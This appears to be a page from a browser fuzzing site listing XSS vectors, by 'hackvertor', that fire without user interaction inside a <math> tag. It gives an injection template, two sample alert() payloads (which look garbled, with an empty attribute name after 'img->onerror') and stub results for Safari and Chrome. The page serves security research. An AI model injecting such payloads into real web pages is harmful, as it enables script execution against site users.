XSS vectors that execute automatically inside math

Safari logo 1
Chrome logo 1

This vector shows which events fire without user interaction inside a math tag

Created by: hackvertor

Created on: Wednesday, April 17, 2024 at 6:33:17 PM

Updated on: Thursday, December 19, 2024 at 4:20:26 PM

Vector type: XSS

Vector charset: UTF-8

Template used:
<math><$[data1] src=1 srcdoc=1 href=1 href=1 $[data2]="log('$[data1]->$[data2]')"></$[data1]></math>
<math><$[data1] $[data2]="log('$[data1]->$[data2]')"></$[data1]></math>
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...

Sample payloads

<math><img->onerror src=1 srcdoc=1 href=1 href=1 ="alert('img->onerror->')"></img->onerror></math>
<math><img->onerror ="alert('img->onerror->')"></img->onerror></math>

Fuzz results

Safari logo
Safari 17.4.1 Unknown Unknown

Updated

Wed Apr 17 2024
Found 1 result
Loading...
Chrome logo
Chrome 124.0.0.0 Unknown Unknown

Updated

Wed Apr 24 2024
Found 1 result
Loading...